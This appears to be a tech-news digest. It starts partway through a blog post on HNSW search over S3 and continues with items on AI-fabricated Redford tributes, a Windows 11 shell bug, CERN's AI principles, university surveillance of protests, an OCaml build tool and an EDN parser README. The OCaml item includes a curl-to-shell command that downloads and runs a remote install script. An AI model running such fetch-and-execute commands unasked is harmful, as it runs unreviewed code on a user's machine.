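def ivf_search(query, vectors, centroids, assign, n_probe=2, k=10):
    # Probe only the n_probe nearest clusters: one batched read per
    # cluster instead of many iterative random reads.
    nearest = np.argsort(np.linalg.norm(centroids - query, axis=1))[:n_probe]
    candidates = np.where(np.isin(assign, nearest))[0]
    scores = vectors[candidates] @ query
    return candidates[np.argsort(-scores)[:k]]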

Yes, I could just hack IVF support into Nixiesearch (as Lucene already supports flat indexes), but there’s a better way. S3 has almost unlimited concurrency: can we untangle the reads from being iterative into being batched and concurrent?

Traversing the HNSW graph for k-NN search is iterative:

  • You land on an entrypoint node, which has M connections to other neighbor nodes.

  • For each connection, you load its embedding (doing an S3 GetObject request) and compute a cosine distance.

  • After all M neighbor distances are evaluated, you jump to the best next node.

Sequential reads, oh no!

But you don’t need to be iterative while loading neighbor embeddings: Lucene’s HnswGraphSearcher is already quite close to being bent in the direction of making embedding loads concurrent and parallel:

So my personal plan for the Christmas holidays is to add a custom Scorer implementation that schedules N parallel S3 GetObject requests to fetch N embeddings on each node visit:

  • HNSW graph usually has only ~3 layers, so you need to evaluate 1 entrypoint + 3 layers = 4 nodes, doing 4 batches of ~32-64 S3 requests.

  • Each batch of S3 GetObject requests is ~15ms, so baseline latency is expected to be ~60ms for a complete search stage.

  • To fetch N documents, you also need to prefetch N chunks of stored fields, which is also a perfectly concurrent operation.

A theoretical ~100ms baseline latency of HNSW running on top of S3 - sounds nice, huh?
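
The concurrency pattern itself is the easy part. Here is a hedged Python/boto3 sketch of "fetch one batch of neighbor embeddings per visited node"; the bucket name and key layout are invented for illustration, and the real plan is a custom Lucene Scorer on the JVM, not Python:

from concurrent.futures import ThreadPoolExecutor
import boto3

s3 = boto3.client("s3")
BUCKET = "nixiesearch-index-demo"  # placeholder bucket name

def fetch_embedding(doc_id):
    # One keyed read per neighbor embedding.
    obj = s3.get_object(Bucket=BUCKET, Key=f"embeddings/{doc_id}")
    return doc_id, obj["Body"].read()

def fetch_neighbor_batch(doc_ids, max_workers=64):
    # Issue the whole batch of GetObject calls concurrently, so latency
    # per HNSW layer is roughly one S3 round-trip, not one per neighbor.
    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        return dict(pool.map(fetch_embedding, doc_ids))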

Usually at the end of an article a well-educated author puts a summary of what you might have learned while reading it, so here we are:

  • AWS Lambdas are not your friendly docker containers: the storage system is completely different, and the runtime semantics, with constant freeze-thaw cycles, is what really surprised me.

  • Running HNSW search on top of network-attached storage is painfully slow right now - sequential random reads, you know. But there’s light at the end of the tunnel, and you don’t need to sacrifice recall for a cheap and fast search.

  • If you’re brave (and stupid) enough (like me) to spend a weekend on putting a search engine in a lambda, you can do it.

If you haven’t yet tried Nixiesearch, you should: https://github.com/nixiesearch/nixiesearch - a recent 0.8.0 version was used for all the experiments in this post.


‘Extra challenging during a difficult time’: Robert Redford’s daughter criticises AI tributes to the late actor

Guardian
www.theguardian.com
2025-11-24 11:04:46
Amy Redford thanks fans for ‘love and support’ but takes issue with ‘AI versions of funerals, tributes and quotes from members of my family that are fabrications’ Robert Redford’s daughter Amy Redford has criticised the proliferation of artificial intelligence tributes to her father, who died in Sep...
Original Article

Robert Redford’s daughter Amy Redford has criticised the proliferation of artificial intelligence tributes to her father, who died in September , calling them “fabrications”.

Redford posted a statement on social media in which she thanked fans for their “overwhelming love and support”, adding: “It’s clear that he meant so much to so many, and I know that my family is humbled by the outpouring of stories and tributes from all corners of the globe.”


She went on to say: “There have been multiple AI versions of funerals, tributes and quotes from members of my family that are fabrications. Renderings of my dad who clearly has no say, and depictions of my family that do not represent anyone in a positive light are extra challenging during a difficult time.”

Redford said that no public funeral has taken place, and that a memorial to her father’s life is still being planned, saying: “Every family should have the ability to mourn, represent the person they lost, and pay homage in the way that fits their values and family culture best.”

Redford added: “My hope is to keep AI in the land of transparent usage where it belongs. There are many elements of it that were created with good intent. I simply ask, what if this was you? Let that be your guidepost.”

The Attention Economy Navigator, November 2025 w/ Nima Shirazi

OrganizingUp
convergencemag.com
2025-11-24 11:00:00
This week on the show we are debuting a new format we’re calling the Attention Economy Navigator. The goal of Block & Build has always been to help organizers figure out what’s happening, how people are responding, and get a sense for what’s working out there in the world. The Attention Economy ...

Microsoft: Windows 11 24H2 bug crashes Explorer and Start Menu

Bleeping Computer
www.bleepingcomputer.com
2025-11-24 10:41:50
Microsoft has confirmed a critical Windows 11 24H2 bug that causes the File Explorer, the Start Menu, and other key system components to crash after installing cumulative updates released since July 2025. [...]...
Original Article


Microsoft has confirmed a critical Windows 11 24H2 bug that causes the File Explorer, the Start Menu, and other key system components to crash after installing cumulative updates released since July 2025.

This bug affects users who log in after applying the cumulative updates and those using non-persistent operating system installations (such as virtual desktop infrastructure environments), where app packages must reinstall each session. On impacted systems, it causes issues for multiple essential Windows 11 shell components when XAML dependency packages fail to register properly after updates.

As Microsoft explained in a recent support document, applications that depend on XAML packages (specifically MicrosoftWindows.Client.CBS, Microsoft.UI.Xaml.CBS, and MicrosoftWindows.Client.Core) aren't registering in time after an update is installed, a timing issue that cascades through the system, preventing critical interface components from initializing properly.


This causes shell components such as Explorer.exe, StartMenuExperienceHost, and ShellHost.exe to crash with visible errors or fail silently, leaving users with partially functional systems that cannot display various navigation tools.

Affected users can experience a wide range of problems, including Start menu crashes (often accompanied by critical error messages), missing taskbars even when Explorer.exe is running, the core ShellHost (Shell Infrastructure Host or Windows Shell Experience Host) system process crashing, and the Settings app silently failing to launch.

"After provisioning a PC with a Windows 11, version 24H2 monthly cumulative update released on or after July 2025 (KB5062553), various apps such as StartMenuExperiencehost, Search, SystemSettings, Taskbar or Explorer might experience difficulties," Microsoft said .

"The applications have dependency on XAML packages that are not registering in time after installing the update. We are working on a resolution and will provide more information when it is available."

Temporary workaround available

Microsoft stated it's developing a resolution but hasn't provided a timeline for the fix. While Microsoft continues to work on a permanent fix, it has provided PowerShell commands to manually register the missing packages.

Affected users must run these three Add-AppxPackage commands targeting each affected XAML package, then restart the system to restore functionality:

Add-AppxPackage -Register -Path 'C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\appxmanifest.xml' -DisableDevelopmentMode
Add-AppxPackage -Register -Path 'C:\Windows\SystemApps\Microsoft.UI.Xaml.CBS_8wekyb3d8bbwe\appxmanifest.xml' -DisableDevelopmentMode
Add-AppxPackage -Register -Path 'C:\Windows\SystemApps\MicrosoftWindows.Client.Core_cw5n1h2txyewy\appxmanifest.xml' -DisableDevelopmentMode 

However, the bug particularly impacts organizations managing non-persistent enterprise environments using virtual desktop infrastructure, where employees must re-provision applications at each login.

For them, Microsoft recommends running this logon script on non-persistent OS installations that will execute before Explorer launches. The batch file wrapper ensures required packages are fully provisioned before the desktop environment loads, preventing the timing race condition.

Last week, Nvidia also released a GeForce Hotfix Display Driver to address gaming performance issues triggered by the KB5066835 Windows 11 October 2025 cumulative update, while Microsoft released out-of-band emergency updates to fix extended security updates (ESU) install errors and a Windows 11 hotpatch install loop.


Shai-Hulud Returns: Over 300 NPM Packages Infected

Hacker News
helixguard.ai
2025-11-24 10:40:22
Comments...

General principles for the use of AI at CERN

Hacker News
home.web.cern.ch
2025-11-24 10:37:05
Comments...
Original Article

Artificial intelligence (AI) can be found at CERN in many contexts: embedded in devices, software products and cloud services procured by CERN, brought on-site by individuals or developed in-house.

Following the approval of a CERN-wide AI strategy, these general principles are designed to promote the responsible and ethical use, development and deployment (collectively “use”) of AI at CERN.

They are technology neutral and apply to all AI technologies as they become available.

The principles apply across all areas of CERN’s activities, including:

  • AI for scientific and technical research : data analysis, anomaly detection, simulation, predictive maintenance and optimisation of accelerator performance or detector operations, and
  • AI for productivity and administrative use : document drafting, note taking, automated translation, language correction and enhancement, coding assistants, and workflow automation.

General Principles

CERN, members of its personnel, and anyone using CERN computing facilities shall ensure that AI is used in accordance with the following principles:

  1. Transparency and explainability : Document and communicate when and how AI is used, and how AI contributes to specific tasks or decisions.
  2. Responsibility and accountability : The use of AI, including its impact and resulting outputs throughout its lifecycle, must not displace ultimate human responsibility and accountability.
  3. Lawfulness and conduct : The use of AI must be lawful, compliant with CERN’s internal legal framework and respect third-party rights and CERN’s Code of Conduct.
  4. Fairness, non-discrimination, and “do no harm” : AI must be used in a way that promotes fairness and inclusiveness and prevents bias, discrimination and any other form of harm.
  5. Security and safety : AI must be adequately protected to reduce the likelihood and impact of cybersecurity incidents. AI must be used in a way that is safe, respects confidentiality, integrity and availability requirements, and prevents negative outcomes.
  6. Sustainability : The use of AI must be assessed with the goal of mitigating environmental and social risks and enhancing CERN's positive impact in relation to society and the environment.
  7. Human oversight : The use of AI must always remain under human control. Its functioning and outputs must be consistently and critically assessed and validated by a human.
  8. Data privacy : AI must be used in a manner that respects privacy and the protection of personal data.
  9. Non-military purposes : Any use of AI at CERN must be for non-military purposes only.
Diagram: a one-page summary of the main themes of the CERN AI strategy.

What are you doing this week?

Lobsters
lobste.rs
2025-11-24 10:10:21
What are you doing this week? Feel free to share! Keep in mind it’s OK to do nothing at all, too....
Original Article

What are you doing this week? Feel free to share!

Keep in mind it’s OK to do nothing at all, too.

Alice - new build system for Ocaml

Lobsters
www.alicecaml.org
2025-11-24 10:04:16
Comments...
Original Article

Alice is a radical, experimental OCaml build system and package manager. Its goal is to allow anyone to program in OCaml with as little friction as possible.

Install Alice by running the following command:

curl -fsSL https://alicecaml.org/install.sh | sh

Alternatively, see more installation options here.

Here’s how to run your first OCaml program on a computer with no pre-installed OCaml tools (you will need a C compiler though!):

$ alice tools install
$ alice new hello
$ cd hello
$ alice run

Hello, World!

That first line downloads an OCaml compiler toolchain and a couple of development tools (ocamllsp and ocamlformat). Skip it if you already have an existing installation of OCaml. Alice runs the OCaml compiler (ocamlopt.opt) by searching the directories in your PATH variable and only uses its own installation of the tools (installed by alice tools install) as a fallback.

This project is exploring alternative approaches to OCaml packaging than those chosen by Opam and alternative approaches to building projects than those chosen by Dune .

How Corporate Partnerships Powered University Surveillance of Palestine Protests

Intercept
theintercept.com
2025-11-24 10:00:00
Officials at the University of Houston used Dataminr to surveil students, while University of Connecticut administrators voiced concerns over protests against a military contractor and major donor. The post How Corporate Partnerships Powered University Surveillance of Palestine Protests appeared fir...
Original Article

A cluster of tents had sprung up on the University of Houston’s central lawn. Draped in keffiyehs and surrounded by a barricade of plywood pallets, students stood on a blue tarp spread over the grass. Tensions with administrators were already high before students pitched their tents, with incidents like pro-Palestine chalk messages putting university leaders on high alert.

What the students didn’t know at the time was that the University of Houston had contracted with Dataminr, an artificial intelligence company with a troubling record on constitutional rights , to gather open-source intelligence on the student-led movement for Palestine. Using an AI tool known as “First Alert,” Dataminr was scraping students’ social media activity and chat logs and sending what it learned to university administration.

This is the first detailed reporting on how a U.S. university used the AI technology to surveil its own students. It’s just one example of how public universities worked with private partners to surveil student protests, revealing how corporate involvement in higher education can be leveraged against students’ free expression.

This is the final installment in an investigative series on the draconian surveillance practices that universities across the country employed to crack down on the 2024 pro-Palestine encampments and student protests. More than 20,000 pages of documentation covering communications from April and May 2024, which The Intercept obtained via public records requests, reveal a systematic pattern of surveillance by U.S. universities in response to their students’ dissent. Public universities in California tapped emergency response funds for natural disasters to quell protests; in Ohio and South Carolina, schools received briefings from intelligence-sharing fusion centers ; and at the University of Connecticut, student participation in a protest sent administrators into a frenzy over what a local military weapons manufacturer would think.

The series traces how universities, as self-proclaimed safe havens of free speech, exacerbated the preexisting power imbalance between institutions with billion-dollar endowments and a nonviolent student movement by cracking down on the latter. It offers a preview of the crackdown to come under the Trump administration as the president re-entered office and demanded concessions from U.S. universities in an attempt to limit pro-Palestine dissent on college campuses.

“Universities have a duty of care for their students and the local community,” Rory Mir, associate director of community organizing at the Electronic Frontier Foundation, told The Intercept. “Surveillance systems are a direct affront to that duty for both. It creates an unsafe environment, chills speech, and destroys trust between students, faculty, and the administration.”

At the University of Houston, the encampment was treated as an unsafe environment. University communications officials using Dataminr forwarded the alerts — which consist of an incident location and an excerpt of the scraped text — directly to the campus police. One alert sent by Dataminr to a University of Houston communications official identified a potential pro-Palestine incident based on chat logs it scraped from a semi-private Telegram channel called “Ghosts of Palestine.”

“University of Houston students rise up for Gaza, demanding an end to Genocide,” the chat stated. First Alert flagged it as an incident of concern and forwarded the information to university officials.


According to Dataminr’s marketing materials, First Alert is designed for use by first responders, sending incident reports to help law enforcement officials gather situational awareness. But instead of relying on officers to collect the intelligence themselves, First Alert relies on Dataminr’s advanced algorithm to gather massive amounts of data and make decisions. In short, Dataminr’s powerful algorithm gathers intelligence, selects what it views to be important, and then forwards it to the paying client.

A follow-up public records request sent to the University of Houston returned records of more than 900 First Alert emails in the inbox of a university administrator, only in April 2024.

The AI company has been implicated in a number of scandals, including the domestic surveillance of Black Lives Matter protesters in 2020 and abortion rights protesters in 2023. The Intercept reported in April that the Los Angeles Police Department used First Alert to monitor pro-Palestine demonstrations in LA. First Alert is one, but not the only, service that Dataminr offers. For newsrooms to corporate giants, Dataminr’s powerful algorithms power intelligence gathering and threat response for those willing to pay.

“It’s concerning enough when you see evidence of university officials scrolling through individual student social media, that’s going to chill people’s speech,” said Nathan Wessler, deputy director of the ACLU’s Speech, Privacy, and Technology Project. “But it’s a whole other level of concern when you start contracting with these companies that are using some kind of algorithm to analyze, at scale, people’s speech online.”

The University of Houston and Dataminr did not respond to multiple requests for comment.

While the University of Houston leaned on Dataminr to gather intelligence on the student-led movement for Palestine, it is just one example of the open-source intelligence practices used by universities in the spring of 2024. From screenshots of students’ Instagram posts to the use of on-campus surveillance cameras, the documents obtained by The Intercept illustrate how the broadening net of on-campus intelligence gathering swept up constitutionally protected speech in the name of “social listening.”

University communications officials were often left to do the heavy lifting of hunting down activists’ social media accounts to map out planned demonstrations. Posts by local Students for Justice in Palestine chapters announcing upcoming demonstrations were frequently captured by administrators and forwarded on. In other cases, university administrators relied on in-person intelligence gathering.

One set of communications in the documents suggests that at one point, University of Connecticut administrators were watching the students in the on-campus encampment sleep. “They are just beginning to wake up. It’s still very quiet. Just a couple of police cars nearby,” a UConn administrator wrote to other officials that April.

U.S. universities, faced with the largest student protest movement in decades, used open-source intelligence to monitor the student-led movement for Palestine and to inform whether or not they would negotiate, and eventually, how they would clear the encampments. Emily Tucker, the executive director of the Center on Privacy and Technology at Georgetown Law, situated the development as part of the broader corporatization of U.S. higher education.

“Institutions that are supposed to be for the public good are these corporate products that make them into vehicles for wealth extraction via data products,” Tucker told The Intercept. “Universities are becoming more like for-profit branding machines, and at the same time, digital capitalism is exploding.”

At UConn, the relationship between the corporate world and higher education led to a brief panic among university administrators. After protesters, including members of UConn’s chapter of Students for Justice in Palestine and a campus group called Unchained, blocked access to a military aircraft manufacturing facility about 25 miles from campus, administrators went into a frenzy over what the military contractor would think.

“Ok. The P&W CEO is pretty upset with us about it right now and is pressing [University President] Radenka [Maric] for action,” wrote Nathan Fuerst to Kimberly Beardsley-Carr, both high-level UConn administrators. “Can you see if UConn PD can proactively reach out? If we can determine that no UConn Students were arrested, that would be immensely helpful.”

Fuerst was referring to a contractor for the Israeli military called Pratt & Whitney, a subsidiary of the $235 billion company formerly known as Raytheon — and a major UConn donor. Both UConn and Pratt & Whitney denied that the request occurred, pointing out that the military contractor has no CEO. Fuerst, Beardsley-Carr, and Maric did not respond to requests for comment.

Beardsley-Carr, in her own email sent four minutes after Fuerst’s, repeated the request: “As you can see below, the President is getting pressure from the CEO of Pratt and Whitney.”

Whether the company made the request or if it was, as UConn spokesperson Stephanie Reitz told The Intercept, “a misunderstanding,” it’s clear from the communications that UConn administrators were concerned about what the weapons manufacturer would think — and sprang to action, gathering information on students because of it.

Pratt & Whitney has donated millions of dollars to various university initiatives, and in April 2024, the same month as the protest, it was announced that a building on campus would be rededicated as the “Pratt & Whitney Engineering Building.” A partnership between the school and the company received an honorable mention from the governor’s office, prompting a Pratt & Whitney program engineer to write in an email: “It’s wonderful! P&W and UCONN have done some great things together.”

After a flurry of emails over the Pratt & Whitney arrests, on April 25, the UConn administrators’ concerns were lifted. “Middletown PD provided me with the names of the 10 individuals arrested during the below incident. None of the arrestees are current students,” UConn Police Lieutenant Douglas Lussier wrote to Beardsley-Carr.

“You have no idea how happy you just made me,” Beardsley-Carr wrote back.

It’s not just UConn, but U.S. higher education as a whole that has a deep and long-standing relationship with military weapons manufacturers. Whether it is endowed professorships, “Lockheed Martin Days,” defense industry presence at career fairs, or private donations, the defense industry has a hold on U.S. higher education, especially at elite universities, which serve as training grounds for high-paying and influential careers.

“These universities are the epicenter, the home base, of the future generation of Americans, future policy makers,” said Tariq Kenney-Shawa, Al-Shabaka’s U.S. Policy Fellow. If universities “were so confident in Israel’s narrative and their narrative being the correct one,” Kenney-Shawa added, “they would let that debate in such important spaces play out.”

Some students who spoke with The Intercept emphasized that as a result of the surveillance they encountered during the protests, they have stepped up their digital security, using burner phones and limiting communication about potential demonstrations to secure messaging channels.

“The campus is waiting and watching for these kinds of things,” said Kirk Wolff, a student at the University of Virginia who said he was threatened with expulsion for a one-man sit-in he staged on campus and expressed fear that university administrators would read his emails.

The surveillance had a “chilling effect,” in his experience, Wolff said. “I had so many people tell me that they wanted to join me, that they agreed with me, and that they simply could not, because they were scared that the school would turn over their information.”

The University of Virginia did not respond to a request for comment on Wolff’s claims.

The surveillance detailed in this investigation took place under the Biden administration, before Trump returned to power and dragged the crackdown on pro-Palestine dissent into the open. Universities have since shared employee and student files with the Trump administration as it continues to investigate “anti-Semitic incidents on campus” — and use the findings as pretext to defund universities or even target students for illegal deportation.

Any open-source intelligence universities gathered could become fair game for federal law enforcement agencies as they work to punish those involved in the student-led movement for Palestine, Mir noted.

“A groundwork of surveillance has been built slowly on many college campuses for decades,” he said. “Now very plainly and publicly we have seen it weaponized against speech.”

Research support provided by the nonprofit newsroom Type Investigations.

edn.c: A fast, zero-copy EDN (Extensible Data Notation) reader written in C11 with SIMD acceleration

Lobsters
github.com
2025-11-24 09:50:20
Comments...
Original Article

EDN.C

A fast, zero-copy EDN (Extensible Data Notation) reader written in C11 with SIMD acceleration.

CI License: MIT

TL;DR - What is EDN?

EDN (Extensible Data Notation) is a data format similar to JSON, but richer and more extensible. Think of it as "JSON with superpowers":

  • JSON-like foundation : Maps {:key value} , vectors [1 2 3] , strings, numbers, booleans, null ( nil )
  • Additional built-in types : Sets #{:a :b} , keywords :keyword , symbols my-symbol , characters \newline , lists (1 2 3)
  • Extensible via tagged literals : #inst "2024-01-01" , #uuid "..." —transform data at parse time with custom readers
  • Human-friendly : Comments, flexible whitespace, designed to be readable and writable by both humans and programs
  • Language-agnostic : Originally from Clojure, but useful anywhere you need rich, extensible data interchange

Why EDN over JSON? More expressive types (keywords, symbols, sets), native extensibility through tags (no more {"__type": "Date", "value": "..."} hacks), and better support for configuration files and data interchange in functional programming environments.
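
For instance, the snippet below (a sketch that uses only functions documented later in this README, and assumes edn.h and stdio.h are included as in the Quick Start) parses a value with no direct JSON equivalent: a set of keywords wrapped in a tagged literal.

// A set of keywords wrapped in a tagged literal
edn_result_t r = edn_read("#my/tag #{:clojure :rust :c}", 0);

const char *tag;
size_t tag_len;
edn_value_t *wrapped;

// With the default options, unknown tags are returned as EDN_TYPE_TAGGED
if (r.error == EDN_OK && edn_tagged_get(r.value, &tag, &tag_len, &wrapped)) {
    printf("tag %.*s wraps a set of %zu keywords\n",
           (int)tag_len, tag, edn_set_count(wrapped));
}
edn_free(r.value);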

Learn more: Official EDN specification

Features

  • 🚀 Fast : SIMD-accelerated parsing with NEON (ARM64), SSE4.2 (x86_64) and SIMD128 (WebAssembly) support
  • 🌐 WebAssembly : Full WASM SIMD128 support for high-performance parsing in browsers and Node.js
  • 💾 Zero-copy : Minimal allocations, references input data where possible
  • 🎯 Simple API : Easy-to-use interface with comprehensive type support
  • 🧹 Memory-safe : Arena allocator for efficient cleanup - single edn_free() call
  • 🔧 Zero Dependencies : Pure C11 with standard library only
  • ✅ Fully Tested : 340+ tests across 24 test suites
  • 📖 UTF-8 Native : All string inputs and outputs are UTF-8 encoded
  • 🏷️ Tagged Literals : Extensible data types with custom reader support
  • 🗺️ Map Namespace Syntax : Clojure-compatible #:ns{...} syntax (optional, disabled by default)
  • 🔤 Extended Characters : \formfeed , \backspace , and octal \oNNN literals (optional, disabled by default)
  • 📝 Metadata : Clojure-style metadata ^{...} syntax (optional, disabled by default)
  • 📄 Text Blocks : Java-style multi-line text blocks """\n...\n""" (experimental, disabled by default)
  • 🔢 Ratio Numbers : Clojure-compatible ratio literals 22/7 (optional, disabled by default)
  • 🔣 Extended Integers : Hex ( 0xFF ), octal ( 0777 ), binary ( 2r1010 ), and arbitrary radix ( 36rZZ ) formats (optional, disabled by default)
  • 🔢 Underscore in Numeric Literals : Visual grouping with underscores 1_000_000 , 3.14_15_92 , 0xDE_AD_BE_EF (optional, disabled by default)

Table of Contents

Installation

Requirements

  • C11 compatible compiler (GCC 4.9+, Clang 3.1+, MSVC 2015+)
  • Make (Unix/macOS) or CMake (Windows/cross-platform)
  • Supported platforms:
    • macOS (Apple Silicon M1/M2/M3, Intel) - NEON/SSE4.2 SIMD
    • Linux (ARM64, x86_64) - NEON/SSE4.2 SIMD
    • Windows (x86_64, ARM64) - NEON/SSE4.2 SIMD via MSVC/MinGW/Clang
    • WebAssembly - SIMD128 support for browsers and Node.js

Build Library

Unix/macOS/Linux:

# Clone the repository
git clone https://github.com/DotFox/edn.c.git
cd edn.c

# Build static library (libedn.a)
make

# Run tests to verify build
make test

Windows:

# Clone the repository
git clone https://github.com/DotFox/edn.c.git
cd edn.c

# Build with CMake (works with MSVC, MinGW, Clang)
.\build.bat

# Or use PowerShell script
.\build.ps1 -Test

See docs/WINDOWS.md for detailed Windows build instructions.

Integrate Into Your Project

Option 1: Link static library

# Compile your code
gcc -o myapp myapp.c -I/path/to/edn.c/include -L/path/to/edn.c -ledn

# Or add to your Makefile
CFLAGS += -I/path/to/edn.c/include
LDFLAGS += -L/path/to/edn.c -ledn

Option 2: Include source directly

Copy include/edn.h and all files from src/ into your project and compile them together.
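
For example (a sketch only; adjust the paths to wherever you copied the files), compiling your application together with the copied parser sources could look like this:

# Assuming edn.h and the src/*.c files were copied into third_party/edn/
gcc -std=c11 -O2 -o myapp myapp.c third_party/edn/*.c -Ithird_party/edn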

Quick Start

#include "edn.h"
#include <stdio.h>

int main(void) {
    const char *input = "{:name \"Alice\" :age 30 :languages [:clojure :rust]}";
    
    // Read EDN string
    edn_result_t result = edn_read(input, 0);
    
    if (result.error != EDN_OK) {
        fprintf(stderr, "Parse error at line %zu, column %zu: %s\n",
                result.error_line, result.error_column, result.error_message);
        return 1;
    }
    
    // Access the parsed map
    edn_value_t *map = result.value;
    printf("Parsed map with %zu entries\n", edn_map_count(map));
    
    // Look up a value by key
    edn_result_t key_result = edn_read(":name", 0);
    edn_value_t *name_value = edn_map_lookup(map, key_result.value);
    
    if (name_value != NULL && edn_type(name_value) == EDN_TYPE_STRING) {
        size_t len;
        const char *name = edn_string_get(name_value, &len);
        printf("Name: %.*s\n", (int)len, name);
    }
    
    // Clean up - frees all allocated memory
    edn_free(key_result.value);
    edn_free(map);
    
    return 0;
}

Output:

Parsed map with 3 entries
Name: Alice

Whitespace and Control Characters

EDN.C follows Clojure's exact behavior for whitespace and control character handling:

Whitespace Characters

The following characters act as whitespace delimiters (separate tokens):

Character   Hex    Name                   Common Use
(space)     0x20   Space                  Standard spacing
\t          0x09   Tab                    Indentation
\n          0x0A   Line Feed (LF)         Unix line ending
\r          0x0D   Carriage Return (CR)   Windows line ending
\f          0x0C   Form Feed              Page break
\v          0x0B   Vertical Tab           Vertical spacing
,           0x2C   Comma                  Optional separator
FS          0x1C   File Separator         Data separation
GS          0x1D   Group Separator        Data separation
RS          0x1E   Record Separator       Data separation
US          0x1F   Unit Separator         Data separation

Examples:

// All of these parse as vectors with 3 elements:
edn_read("[1 2 3]", 0);          // spaces
edn_read("[1,2,3]", 0);          // commas
edn_read("[1\t2\n3]", 0);        // tabs and newlines
edn_read("[1\f2\x1C3]", 0);      // formfeed and file separator

Control Characters in Identifiers

Control characters 0x00-0x1F (except whitespace delimiters) are valid in identifiers (symbols and keywords):

Valid identifier characters:

  • 0x00 - 0x08 : NUL, SOH, STX, ETX, EOT, ENQ, ACK, BEL, Backspace
  • 0x0E - 0x1B : Shift Out through Escape

Examples:

// Backspace in symbol - valid!
edn_result_t r = edn_read("[\bfoo]", 0);  // 1-element vector
edn_vector_count(r.value);  // Returns 1
edn_free(r.value);

// Control characters in middle of identifier
const char input[] = {'[', 'f', 'o', 'o', 0x08, 'b', 'a', 'r', ']', 0};
r = edn_read(input, sizeof(input) - 1);
edn_vector_count(r.value);  // Returns 1 (symbol: "foo\bbar")
edn_free(r.value);

// Versus whitespace - separates into 2 elements
edn_result_t r2 = edn_read("[foo\tbar]", 0);  // Tab is whitespace
edn_vector_count(r2.value);  // Returns 2 (symbols: "foo" and "bar")
edn_free(r2.value);

Note on null bytes ( 0x00 ): When using string literals with strlen() , null bytes will truncate the string. Always pass explicit length for data containing null bytes:

const char data[] = {'[', 'a', 0x00, 'b', ']', 0};
edn_result_t r = edn_read(data, 5);  // Pass exact length: 5 bytes (excluding terminator)

API Reference

Core Functions

edn_read()

Read EDN from a UTF-8 string.

edn_result_t edn_read(const char *input, size_t length);

Parameters:

  • input : UTF-8 encoded string containing EDN data (must remain valid for zero-copy strings)
  • length : Length of input in bytes, or 0 to use strlen(input)

Returns: edn_result_t containing:

  • value : Parsed EDN value (NULL on error)
  • error : Error code ( EDN_OK on success)
  • error_line , error_column : Error location (1-indexed)
  • error_message : Human-readable error description

Important: The returned value must be freed with edn_free() .
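
As a small illustration of the length parameter (a sketch; both calls parse the same vector), passing 0 lets the parser call strlen() on the input, while an explicit byte count is needed for data that may contain embedded null bytes:

const char *text = "[1 2 3]";

// Length 0: the parser determines the length with strlen()
edn_result_t a = edn_read(text, 0);

// Explicit length in bytes
edn_result_t b = edn_read(text, 7);

// Each successful result must be freed separately
edn_free(a.value);
edn_free(b.value);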

edn_free()

Free an EDN value and all associated memory.

void edn_free(edn_value_t *value);

Parameters:

  • value : Value to free (may be NULL)

Note: This frees the entire value tree. Do not call free() on individual values.

edn_type()

Get the type of an EDN value.

edn_type_t edn_type(const edn_value_t *value);

Returns: One of:

  • EDN_TYPE_NIL
  • EDN_TYPE_BOOL
  • EDN_TYPE_INT (int64_t)
  • EDN_TYPE_BIGINT (arbitrary precision integer)
  • EDN_TYPE_FLOAT (double)
  • EDN_TYPE_BIGDEC (exact precision decimal)
  • EDN_TYPE_RATIO (rational number, requires RATIO=1 build flag)
  • EDN_TYPE_CHARACTER (Unicode codepoint)
  • EDN_TYPE_STRING
  • EDN_TYPE_SYMBOL
  • EDN_TYPE_KEYWORD
  • EDN_TYPE_LIST
  • EDN_TYPE_VECTOR
  • EDN_TYPE_MAP
  • EDN_TYPE_SET
  • EDN_TYPE_TAGGED
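
A common pattern (sketched below) is to dispatch on edn_type() before calling the type-specific accessors described in the following sections:

edn_result_t r = edn_read("42", 0);

switch (edn_type(r.value)) {
    case EDN_TYPE_INT: {
        int64_t n;
        edn_int64_get(r.value, &n);
        printf("integer: %lld\n", (long long)n);
        break;
    }
    case EDN_TYPE_STRING:
        printf("string\n");
        break;
    default:
        printf("some other type\n");
        break;
}

edn_free(r.value);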

Type System

Error Codes

typedef enum {
    EDN_OK = 0,                    // Success
    EDN_ERROR_INVALID_SYNTAX,      // Syntax error
    EDN_ERROR_UNEXPECTED_EOF,      // Unexpected end of input
    EDN_ERROR_OUT_OF_MEMORY,       // Allocation failure
    EDN_ERROR_INVALID_UTF8,        // Invalid UTF-8 sequence
    EDN_ERROR_INVALID_NUMBER,      // Malformed number
    EDN_ERROR_INVALID_STRING,      // Malformed string
    EDN_ERROR_INVALID_ESCAPE,      // Invalid escape sequence
    EDN_ERROR_UNMATCHED_DELIMITER, // Mismatched brackets
    EDN_ERROR_UNKNOWN_TAG,         // Unregistered tag (with ERROR mode)
    EDN_ERROR_DUPLICATE_KEY,       // Map has duplicate keys
    EDN_ERROR_DUPLICATE_ELEMENT    // Set has duplicate elements
} edn_error_t;
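
For example (a sketch; per the duplicate-detection behavior described in the Maps section, the input below is expected to fail with EDN_ERROR_DUPLICATE_KEY), the error fields make it easy to report what went wrong and where:

// A map with a duplicate key is rejected during parsing
edn_result_t r = edn_read("{:a 1 :a 2}", 0);

if (r.error != EDN_OK) {
    fprintf(stderr, "error %d at %zu:%zu: %s\n",
            (int)r.error, r.error_line, r.error_column, r.error_message);
}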

Scalar Types

Strings

const char *edn_string_get(const edn_value_t *value, size_t *length);

Get UTF-8 string data. Returns NULL if value is not a string.

Lazy decoding: For strings without escapes, returns a pointer into the original input (zero-copy). For strings with escapes ( \n , \t , \" , etc.), decodes and caches the result on first call.

Example:

edn_result_t r = edn_read("\"Hello, world!\"", 0);
size_t len;
const char *str = edn_string_get(r.value, &len);
printf("%.*s\n", (int)len, str);
edn_free(r.value);

Booleans and Nil

bool edn_is_nil(const edn_value_t *value);

Check if value is nil. Returns true if value is EDN_TYPE_NIL , false otherwise.

Example:

edn_result_t r = edn_read("nil", 0);
if (edn_is_nil(r.value)) {
    printf("Value is nil\n");
}
edn_free(r.value);
bool edn_bool_get(const edn_value_t *value, bool *out);

Get boolean value. Returns true if value is EDN_TYPE_BOOL , false otherwise.

Example:

edn_result_t r = edn_read("true", 0);
bool val;
if (edn_bool_get(r.value, &val)) {
    printf("Boolean: %s\n", val ? "true" : "false");
}
edn_free(r.value);

Integers

bool edn_int64_get(const edn_value_t *value, int64_t *out);

Get int64_t value. Returns true if value is EDN_TYPE_INT , false otherwise.

Example:

edn_result_t r = edn_read("42", 0);
int64_t num;
if (edn_int64_get(r.value, &num)) {
    printf("Number: %lld\n", (long long)num);
}
edn_free(r.value);

Big Integers

